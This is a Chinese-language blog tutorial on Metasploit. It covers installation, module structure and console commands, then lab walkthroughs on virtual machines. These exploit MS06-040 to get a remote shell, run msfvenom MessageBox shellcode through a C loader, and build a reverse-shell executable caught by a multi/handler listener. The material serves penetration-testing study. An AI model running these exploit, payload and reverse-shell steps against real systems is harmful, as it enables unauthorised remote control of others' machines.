MetaSploit 开发 Exploit 教程

MetaSploit 开发 Exploit

1. 安装MetaSploit

1.1 下载

​ metasploit-framework 官网下载:Directory Tree (metasploit.com)

​ 下载最新安装包即可:如下图

image-20240201110947814

1.2 安装

​ 双击下载的metasploitframework-latest.msi,一直点 next,最后选择安装目录即可

1.3 环境变量

  1. 我的电脑 -- 属性 --高级系统设置 -- 属性 -- 环境变量

  2. 选择“Path",再点击“编辑”按钮

  3. 点击”新建“按钮,把此软件的安装目录”D:\metasploit-framework\bin“放进去,再点击”确定“ 即按钮可

  4. 再继续在电脑“开始”菜单,“运行”中输入命令“cmd”,再输入命令“msfconsole”即可正常运行

    image-20240201111022709

2. MSF体系结构

2.1 总体结构图

image-20240201111048046

2.2 Metasploit文件介绍

  • data:Metasploit使用的可编辑文件
  • documentation:为框架提供文档
  • external:源代码和第三方库
  • lib:框架代码库的'肉'
  • modules:实际的MSF模块
  • plugins:可以在运行时加载的插件
  • scripts:Meterpreter和其他脚本
  • tools:各种有用的命令行工具

image-20240201111129000

2.3 Metasploit库

​ 所在地址:D:\metasploit-framework\embedded\framework\lib

image-20240201111157411

2.3.1 Rex

  • 大多数任务的基本库
  • 处理套接字,协议,文本转换和其他
  • SSL,SMB,HTTP,XOR,Base64,Unicode

image-20240201111240085

2.3.2 Msf

1. Core
  • 提供'基本'API
  • 定义Metasploit框架

image-20240201111301737

2. Base
  • 提供'友好'API
  • 提供在框架中使用的简化API

image-20240201111321815

2.4 Metasploit 模块

​ 所在位置:D:\metasploit-framework\embedded\framework\modules

image-20240201111339020

模块类型 说明
exploit 包涵已公布漏洞的触发信息,如返回地址偏移量等
auxiliary MSF额外的插件程序,如网络欺骗工具、DOS工具、Sniffer 工具等
payload 就是我们所说的 shellcode。目前包含了可运行于多种操作系统下的各种用途的 shellcode
encoder 编码算法
nop “准 nop”填充数据生成器。所谓的“准 nop”是指不影响 shellcode 执行的指令。除了最经典的 0x90(nop)之外,如果 EBX 的值不影响 shellcode 执行,那么 0x43(inc ebx)就是 “准 nop”填充数据。
MSF 提供了若干种不同语言版本、不同操作系统 下的“准 nop”填充数据生成器,用于组织缓冲区

3. Metasploit 基础命令

3.1 启动Metasploit

​ msfconsole

帮助文档如下:

用法:msfconsole [选项]

通用选项
-E, --environment ENVIRONMENT     如果已设置,将使用RAIL_ENV环境变量。如果两个选项都不是RAILS_ENV环境变量,则默认为生产。

数据库选项
-M,--migration-path DIRECTORY     指定包含其他数据库迁移的目录
-n,--no-database     禁用数据库支持
-y,--yaml PATH     指定一个包含数据库设置的YAML文件

框架选项
-c FILE     加载指定的配置文件
-v,--version     显示版本

模块选项
--defer-module-loads     延迟模块加载,除非明确询问。
-m,--module-path DIRECTORY     附加模块路径

控制台选项:
-a,--ask     在退出Metasploit之前询问或接受“exit-y”
-H,--history-file FILE     将命令历史保存到指定的文件
-L,--real-readline     使用系统Readline库而不是RbReadline
-o,--output     将文件输出到指定的文件
-p,--plugin PLUGIN     在启动时加载插件
-q,--quiet     不要在启动时打印横幅
-r,--resource FILE     执行指定的资源文件( - 用于stdin)
-x,--execute-command COMMAND     执行指定的字符串作为控制台命令(使用;用于multiples)
-h,--help     显示此消息

image-20240201111419507

3.2 如何使用MSF

命令详解参考文档Metasploit框架 MSFconsole命令 详解 - 付杰博客 (fujieace.com)

​ 在msf命令提示符下输入help将显示可用命令的列表以及它们用于的内容的描述

如下为命令的中文帮助文档:

msf > help
核心命令
=============

?   帮助菜单
banner   显示一个很棒的metasploit横幅
cd   更改当前的工作目
color   切换颜色。如果通过msfconsole获得的输出将包含颜色,则可以启用或禁用颜色输出:color false
connect   连接与主机通信。msfconsole内置了一个微型Netcat克隆,它支持SSL,代理服务器,枢纽和文件传输。
		  通过使用IP地址和端口号发出connect命令,您可以像使用Netcat或Telnet一样,从msfconsole连接到远程主机:connect 192.168.1.1 23
exit   退出控制台
get   获取特定于上下文的变量的值
getg   获取全局变量的值
grep grep另一个命令的输出
help   帮助菜单
history   显示命令历史
irb   进入irb脚本模式
load   加载一个框架插件
quit   退出控制台
route   通过会话路由流量
save   保存活动的数据存储
sessions    转储会话列表并显示有关会话的信息
set   将特定于上下文的变量设置为一个值
setg   将全局变量设置为一个值
sleep   在指定的秒数内不做任何事情
spool   将控制台输出写入文件以及屏幕
threads   线程查看和操作后台线程
unload   卸载框架插件
unset   取消设置一个或多个特定于上下文的变量
unsetg   取消设置一个或多个全局变量
version   显示框架和控制台库版本号

模块命令
===============

advanced   显示一个或多个模块的高级选项
back   从当前上下文返回。一旦你完成了一个特定的模块的工作,或者你无意中选择了错误的模块,你可以发出back命令移出当前的上下文
edit   使用首选编辑器编辑当前模块
info   显示有关一个或多个模块的信息
loadpath   路径从路径搜索并加载模块
options   显示全局选项或一个或多个模块
popm   将最新的模块从堆栈中弹出并使其处于活动状态
previous   将之前加载的模块设置为当前模块
pushm   将活动或模块列表推入模块堆栈
reload_all   从所有定义的模块路径重新加载所有模块
search   搜索模块名称和描述
show   显示给定类型的模块或所有模块
use   按名称选择模块

 
工作命令
============

handler   作为作业启动负载处理程序
jobs   显示和管理作业
kill   杀死一个工作
rename_job   重命名作业

 
资源脚本命令
========================

makerc   保存从开始到文件输入的命令
resource   运行存储在文件中的命令


数据库后端命令
=========================

db_connect   连接到现有的数据库
db_disconnect   断开与当前数据库实例的连接
db_export   导出包含数据库内容的文件
db_import   导入扫描结果文件(文件类型将被自动检测)
db_nmap   执行nmap并自动记录输出
db_rebuild_cache   重建数据库存储的模块高速缓存
db_status   显示当前的数据库状态
hosts   列出数据库中的所有主机
loot   列出数据库中的所有战利品
notes   列出数据库中的所有笔记
services   列出数据库中的所有服务
vulns   列出数据库中的所有漏洞
workspace   在数据库工作区之间切换

凭证后端命令
============================

creds   列出数据库中的所有凭据

实际运行中帮助文档为英文:

msf6 > help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    debug         Display information useful for debugging
    exit          Exit the console
    features      Display the list of not yet released features that can be opted in to
    get           Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    grep          Grep the output of another command
    help          Help menu
    history       Show command history
    load          Load a framework plugin
    quit          Exit the console
    repeat        Repeat a list of commands
    route         Route traffic through a session
    save          Saves the active datastores
    sessions      Dump session listings and display information about sessions
    set           Sets a context-specific variable to a value
    setg          Sets a global variable to a value
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    tips          Show a list of useful productivity tips
    unload        Unload a framework plugin
    unset         Unsets one or more context-specific variables
    unsetg        Unsets one or more global variables
    version       Show the framework and console library version numbers


Module Commands
===============

    Command       Description
    -------       -----------
    advanced      Displays advanced options for one or more modules
    back          Move back from the current context
    clearm        Clear the module stack
    favorite      Add module(s) to the list of favorite modules
    info          Displays information about one or more modules
    listm         List the module stack
    loadpath      Searches for and loads modules from a path
    options       Displays global options or for one or more modules
    popm          Pops the latest module off the stack and makes it active
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    reload_all    Reloads all modules from all defined module paths
    search        Searches module names and descriptions
    show          Displays modules of a given type, or all modules
    use           Interact with a module by name or search term/index


Job Commands
============

    Command       Description
    -------       -----------
    handler       Start a payload handler as job
    jobs          Displays and manages jobs
    kill          Kill a job
    rename_job    Rename a job


Resource Script Commands
========================

    Command       Description
    -------       -----------
    makerc        Save commands entered since start to a file
    resource      Run the commands stored in a file


Database Backend Commands
=========================

    Command           Description
    -------           -----------
    analyze           Analyze database information about a specific address or address range
    db_connect        Connect to an existing data service
    db_disconnect     Disconnect from the current data service
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache (deprecated)
    db_remove         Remove the saved data service entry
    db_save           Save the current data service connection as the default to reconnect on startup
    db_status         Show the current data service status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces


Credentials Backend Commands
============================

    Command       Description
    -------       -----------
    creds         List all credentials in the database


Developer Commands
==================

    Command       Description
    -------       -----------
    edit          Edit the current module or a file with the preferred editor
    irb           Open an interactive Ruby shell in the current context
    log           Display framework.log paged to the end if possible
    pry           Open the Pry debugger on the current module or Framework
    reload_lib    Reload Ruby library files from specified paths
    time          Time how long it takes to run a particular command


msfconsole
==========

`msfconsole` is the primary interface to Metasploit Framework. There is quite a
lot that needs go here, please be patient and keep an eye on this space!

Building ranges and lists
-------------------------

Many commands and options that take a list of things can use ranges to avoid
having to manually list each desired thing. All ranges are inclusive.

### Ranges of IDs

Commands that take a list of IDs can use ranges to help. Individual IDs must be
separated by a `,` (no space allowed) and ranges can be expressed with either
`-` or `..`.

### Ranges of IPs

There are several ways to specify ranges of IP addresses that can be mixed
together. The first way is a list of IPs separated by just a ` ` (ASCII space),
with an optional `,`. The next way is two complete IP addresses in the form of
`BEGINNING_ADDRESS-END_ADDRESS` like `127.0.1.44-127.0.2.33`. CIDR
specifications may also be used, however the whole address must be given to
Metasploit like `127.0.0.0/8` and not `127/8`, contrary to the RFC.
Additionally, a netmask can be used in conjunction with a domain name to
dynamically resolve which block to target. All these methods work for both IPv4
and IPv6 addresses. IPv4 addresses can also be specified with special octet
ranges from the [NMAP target
specification](https://nmap.org/book/man-target-specification.html)

### Examples

Terminate the first sessions:

    sessions -k 1

Stop some extra running jobs:

    jobs -k 2-6,7,8,11..15

Check a set of IP addresses:

    check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255

Target a set of IPv6 hosts:

    set RHOSTS fe80::3990:0000/110, ::1-::f0f0

Target a block from a resolved domain name:

    set RHOSTS www.example.test/24

3.3 Tab完成(标签完成/选项卡完成)

​ msfconsole被设计为可以快速使用,并且有助于实现此目标的功能之一是制表符完成。

​ 有了各种可用的模块,可能很难记住您希望使用的特定模块的确切名称和路径。

​ 与大多数其他shell一样,输入你知道的内容并点击'Tab'将会给你一个你可用的选项列表,或者只有一个选项时自动完成字符串。

​ 选项卡完成取决于ruby readline扩展,并且控制台中的几乎每个命令都支持选项卡完成。

举例:运行以下命令再敲Tab键,会弹出以下图片列出的选项以供选择,然后再输入,再敲Tab键会自动补齐

msf > use exploit/windows/smb/ms

image-20240201111627805

4. Metasploit实际应用

4.1 入侵 Windows 系统(CVE-2006-3439)

4.1.1 漏洞简介

​ Windows系统的动态链接库文件netapi32.dll中第317个导出函数NetpwPathCanon- icalize() 对于字符串参数的处理存在典型的栈溢出。更加不幸的是,这个函数可以通过 RPC 的方式被 远程调用,因此,成功利用这个漏洞可以远程控制目标主机。

4.1.2 实验环境

环境 版本备注
攻击主机操作系统 Windows 10 MSF支持的操作系统均可
目标主机操作系统 Windows 2000 SP0~SP4(此次实验用的SP4) Windows XP SP1 中的漏洞也可以获得远程控制权, 但 SP2 上只能达到 DOS 的效果
目标PC 虚拟机VMware Workstation 版本号:15.5 PRO 注意:虚拟机或实体计算机均可用于攻击测试
补丁版本 未打过 KB921883 补丁
测试平台 MSF 版本号:6.18
网络环境 攻击主机与目标主机互相可达 确保防火墙等不会影响 TCP 链接的正常建立

4.1.3 console界面的漏洞测试

1. 用到的相关命令
  • show exploits :显示 MetaSploit 目前所能够测试的所有漏洞及相关描述。
  • use windows/smb/ms06_040_netapi :选择 MS06-040 进行测试。
  • info :显示当前所选漏洞的描述信息。
  • show targets :显示当前所选漏洞能够影响的操作系统。
  • set target 0 :设置 target 为 0,即自动识别 Windows 2000 和 Windows XP 系统。
  • show payloads :显示可适用于当前所选漏洞的 shellcode。
  • set payload windows/adduser :选用 adduser 为 shellcode。
  • show options :显示当前所选漏洞和 shellcode 需要配置的选项。
  • set RHOST 192.168.88.137 :按照 show options 的提示设置目标主机地址
  • set PASS 123456 :按照 show options 的提示设置账户密码
  • set USER failwest :按照 show options 的提示设置用户名
  • exploit :进行攻击测试
2. 实验步骤
  1. 通过虚拟机打开 Windows 2000 SP4,通过cmd打开命令提示符,输入 ipconfig 命令查看IP地址:192.168.137.132

    注意:虚拟机需共享本机的网络,即位于NAT模式下,虚拟机才能和本机互联

    image-20240201111707586

  2. 通过 cmd 打开命令提示符,输入 msfconsole 启动 MSF

    image-20240201111757797

  3. 输入 search ms06_040 命令或 show exploits 查找 MS06_040 漏洞(本次实验实验前者)

    image-20240201111827227

  4. 输入 use exploit/windows/smb/ms06_040_netapi 命令设置使用的漏洞

    image-20240201111929881

  5. 输入 show payloads 命令查找符合要求的 payload,这里使用序号为2的

    image-20240201111953934

  6. 输入 set payload payload/generic/shell_bind_tcp 命令设置 payload 的路径

    image-20240201112015451

  7. 输入 set RHOSTS 192.168.137.132 命令设置目标主机

image-20240201112038377

  1. 输入 run 或者 exploit 运行,此时可以控制目标主机的命令行提示符

    image-20240201112136551

  2. 在目标主机的命令行提示符中输入 ipconfig 命令,即可得到目标主机的 IP 地址

    image-20240201112156093

  3. 在目标主机的命令行提示符中输入 dir 命令,即可显示目标主机的文件目录情况

    image-20240201112315681

4.2 利用 MSF 制作 shellcode

4.2.1 Msfvenom

1. 简介

​ MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中,用于生成 shellcode

2. 参数介绍
-l, --list <type> 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,......all
 
-p, --payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的
 
-f, --format < format> 指定输出格式
 
-e, --encoder <encoder> 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload
 
-a, --arch < architecture> 指定payload的目标架构,例如x86 还是 x64 还是 x86_64
 
-o, --out < path> 指定创建好的payload的存放位置
 
-b, --bad-chars < list> 设定规避字符集,指定需要过滤的坏字符。例如:不使用 '\x0f'、'\x00'
 
-n, --nopsled < length> 为payload预先指定一个NOP滑动长度
 
-s, --space < length> 设定有效攻击荷载的最大长度,就是文件大小
 
-i, --iterations < count> 指定payload的编码次数
 
-c, --add-code < path> 指定一个附加的win32 shellcode文件
 
-x, --template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中
 
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
 
-v, --var-name < value> 指定一个自定义的变量,以确定输出格式
 
-t, --timeout <second> 从stdin读取有效负载时等待的秒数(默认为30,0表示禁用)
 
-h,--help 查看帮助选项
 
--platform < platform> 指定payload的目标平台

4.2.2 生成普通的 shellcode

实验环境
环境 版本备注
攻击主机操作系统 Windows 10 MSF支持的操作系统均可
测试主机操作系统 Windows XP SP3 可以运行 MessageBox shellcode的操作系统均可以(实际上Windows 10也能完成测试)
目标PC 虚拟机VMware Workstation 版本号:15.5 PRO 注意:虚拟机或实体计算机均可用于攻击测试
测试平台 MSF 版本号:6.18
shellcode loader程序
#include <windows.h>
#include <iostream>
#include <tchar.h>
using namespace std;
typedef void(*LPFN_FUNC_1)();
VOID  Sub_1();
VOID  Sub_2();
void main()
{
	//Sub_1();
	Sub_2();
}
VOID Sub_1()
{

	char ShellCode[40] = { 0 };
	ShellCode[0] = 0x8B;
	ShellCode[1] = 0xFF;		
	ShellCode[2] = 0x55;
	ShellCode[3] = 0x8B;
	ShellCode[4] = 0xEC;
	ShellCode[5] = 0xFF;		
	ShellCode[6] = 0x75;
	ShellCode[7] = 0x14;
	ShellCode[8] = 0xFF;		
	ShellCode[9] = 0x75;
	ShellCode[10] = 0x10;
	ShellCode[11] = 0xFF;
	ShellCode[12] = 0x75;		
	ShellCode[13] = 0x0C;
	ShellCode[14] = 0xFF;
	ShellCode[15] = 0x75;		
	ShellCode[16] = 0x08;
	ShellCode[17] = 0x58;
	ShellCode[18] = 0xBB;
	ShellCode[19] = 0x49;	
	ShellCode[20] = 0x89;
	ShellCode[21] = 0xd8;
	ShellCode[22] = 0x48;		
	ShellCode[23] = 0x31;
	ShellCode[24] = 0xd2;
	ShellCode[25] = 0x48;					
	ShellCode[26] = 0x31;
	ShellCode[27] = 0xd1;
	ShellCode[28] = 0x48;				
	ShellCode[29] = 0x8b;
	ShellCode[30] = 0x58;
	ShellCode[31] = 0xCC;
	ShellCode[32] = 0xff;					
	ShellCode[33] = 0xd3;
	ShellCode[34] = 0x48;					
	ShellCode[35] = 0x83;
	ShellCode[36] = 0xc4;
	ShellCode[37] = 0x20;
	ShellCode[38] = 0x5b;				
	ShellCode[39] = 0xc3;		
	VOID* VirtualAddress = (VOID*)VirtualAlloc(NULL, sizeof(ShellCode),
		MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (VirtualAddress==NULL)
	{
		return;
	}
	memcpy(VirtualAddress, ShellCode, sizeof(ShellCode));

	((LPFN_FUNC_1)VirtualAddress)();

	VirtualFree(VirtualAddress, sizeof(ShellCode), MEM_RELEASE);
	VirtualAddress = NULL;
}
VOID Sub_2()
{

	//Stack   
	unsigned char buf[] =
		"\xd9\xeb\x9b\xd9\x74\x24\xf4\x31\xd2\xb2\x77\x31\xc9\x64"
		"\x8b\x71\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x46\x08\x8b\x7e"
		"\x20\x8b\x36\x38\x4f\x18\x75\xf3\x59\x01\xd1\xff\xe1\x60"
		"\x8b\x6c\x24\x24\x8b\x45\x3c\x8b\x54\x28\x78\x01\xea\x8b"
		"\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x34\x49\x8b\x34\x8b\x01"
		"\xee\x31\xff\x31\xc0\xfc\xac\x84\xc0\x74\x07\xc1\xcf\x0d"
		"\x01\xc7\xeb\xf4\x3b\x7c\x24\x28\x75\xe1\x8b\x5a\x24\x01"
		"\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
		"\xe8\x89\x44\x24\x1c\x61\xc3\xb2\x08\x29\xd4\x89\xe5\x89"
		"\xc2\x68\x8e\x4e\x0e\xec\x52\xe8\x9f\xff\xff\xff\x89\x45"
		"\x04\xbb\x7e\xd8\xe2\x73\x87\x1c\x24\x52\xe8\x8e\xff\xff"
		"\xff\x89\x45\x08\x68\x6c\x6c\x20\x41\x68\x33\x32\x2e\x64"
		"\x68\x75\x73\x65\x72\x30\xdb\x88\x5c\x24\x0a\x89\xe6\x56"
		"\xff\x55\x04\x89\xc2\x50\xbb\xa8\xa2\x4d\xbc\x87\x1c\x24"
		"\x52\xe8\x5f\xff\xff\xff\x68\x6f\x78\x58\x20\x68\x61\x67"
		"\x65\x42\x68\x4d\x65\x73\x73\x31\xdb\x88\x5c\x24\x0a\x89"
		"\xe3\x68\x58\x20\x20\x20\x68\x4d\x53\x46\x21\x68\x72\x6f"
		"\x6d\x20\x68\x6f\x2c\x20\x66\x68\x48\x65\x6c\x6c\x31\xc9"
		"\x88\x4c\x24\x10\x89\xe1\x31\xd2\x52\x53\x51\x52\xff\xd0"
		"\x31\xc0\x50\xff\x55\x08";


	VOID* VirtualAddress = (VOID*)VirtualAlloc(NULL, sizeof(buf),
		MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	if (VirtualAddress == NULL)
	{
		return;
	}
	memcpy(VirtualAddress, buf, sizeof(buf));


	((LPFN_FUNC_1)VirtualAddress)();


	VirtualFree(VirtualAddress, sizeof(buf), MEM_RELEASE);
	VirtualAddress = NULL;
}

实验步骤

1)生成 shellcode 放入 shellcode loader 中测试

  1. 输入 msfconsole 启动 MSF

    image-20240201112504242

  2. 输入 show payloads 显示所有的payloads

    image-20240201112532882

  3. 找到需要的 payload

    image-20240201112554594

  4. 打开一个命令行提示符,输入 msfvenom -p windows/messagebox --list-options 可以查看该 payload 所支持的参数

    image-20240201112639918

  5. 输入 msfvenom -a x86 --platform windows -p windows/messagebox -f C 命令,即可生成 c 语言版的shellcode

    image-20240201112701013

  6. 将生成的 shellcode 放入 shellcode loader 程序中,编译运行,最后即可弹出 messagebox

    image-20240201112718020

    在 windows10中也测试成功:

    image-20240201112736891

  7. 输入 msfvenom -a x86 --platform windows -p windows/messagebox TEXT="hello, wzy" -f C 命令将 messagebox 弹窗消息换为 “hello, wzy”

    image-20240201112759013

  8. 将生成的 shellcode 放入 shellcode loader 中测试,测试成功

    Windows 10也测试成功:

    image-20240201112821134

2)生成可直接运行的程序

  1. 输入 msfvenom -a x86 --platform windows -p windows/messagebox -f exe > test.exe 命令,即可生成一个可弹出 messagebox 的exe程序

    image-20240201112843510

  2. 将该程序拖入 Windows XP SP3 中,点击运行,运行成功

    image-20240201112859887

  3. 输入 msfvenom -a x86 --platform windows -p windows/messagebox TEXT="hello, wzy" -f exe > wzy.exe 命令

    image-20240201112925275

  4. 测试成功

    image-20240201112938654

4.2.3 利用 shellcode 控制靶机

实验环境
环境 版本备注
攻击主机操作系统 Windows 10 MSF支持的操作系统均可
目标主机操作系统 Windows XP SP3 简体中文版
目标PC 虚拟机VMware Workstation 版本号:15.5 PRO 注意:虚拟机或实体计算机均可用于攻击测试
测试平台 MSF 版本号:6.18
实验步骤
  1. 输入 msfconsole 启动 MSF

    image-20240201113007513

  2. 输入 show payloads 显示所有的payloads

    image-20240201113028538

  3. 找到需要的 payload

    image-20240201113047763

  4. 打开一个命令行提示符,输入 msfvenom -p windows/shell_reverse_tcp --list-options 可以查看该 payload 所支持的参数

    image-20240201113128320

  5. 在靶机中打开命令行提示符,输入 ipconfig 命令,查看靶机的 IP 地址

    image-20240201113153317

  6. 在本机中打开命令行提示符,输入 ipconfig 查看本机的IP地址

    image-20240201113214023

  7. 在本机的命令行提示符中输入 msfvenom -p windows/shell_reverse_tcp LHOST=10.18.223.52 LPROT=4444 -b '\x00\x0a\x40' -f exe > tcp.exe 命令生成可执行程序

    image-20240201113231862

  8. 将该可执行程序拖入靶机中

  9. 在本机中打开命令行提示符,在msfconsole中输入如下命令:

    use exploit/multi/handler

    set payload windows/shell_reverse_tcp

    set LHOST 192.168.137.131

    set LPORT 4444

    exploit

    image-20240201113250602

  10. 在靶机中点击拖入的可执行程序

    image-20240201113308335

  11. 此时本机程序显示如下信息:此时已成功控制靶机的命令行

    image-20240201113324809

  12. 输入 cd c:\ 可进入靶机的 C 盘,输入 dir 命令可查看靶机的目录,输入 ipconfig 可查看靶机的 IP 地址

    image-20240201113341178

4.3 用 MSF 扫描“跳板”

4.3.1 msfpescan

​ msfpescan 是这样一款在 PE 文件中扫描跳转指令并直接转化为 VA 的工具,它使用起来更加简单灵活

image-20240201113402389

​ 输入 msfpescan -h 即可查看帮助信息:

image-20240201113422363

4.3.2 使用 msfpescan 扫描PE文件中的跳板指令

  1. 输入 msfconsole 启动MSF

    image-20240201113440517

  2. 输入 msfpescan -f -j ecx c:/windows/system32/kernel32.dll 可查看本机中 PE 文件 kernel32.dll 中类似 jump ecx 的指令地址,并转化为 VA 显示

    image-20240201113501089

参考

文档

Metasploit 教程(渗透测试框架) - 付杰博客 (fujieace.com)

(75条消息) Msfvenom介绍及利用_xzhome的博客-CSDN博客_msfvenom

posted @ 2024-02-01 11:41  修竹Kirakira  阅读(195)  评论(0编辑  收藏  举报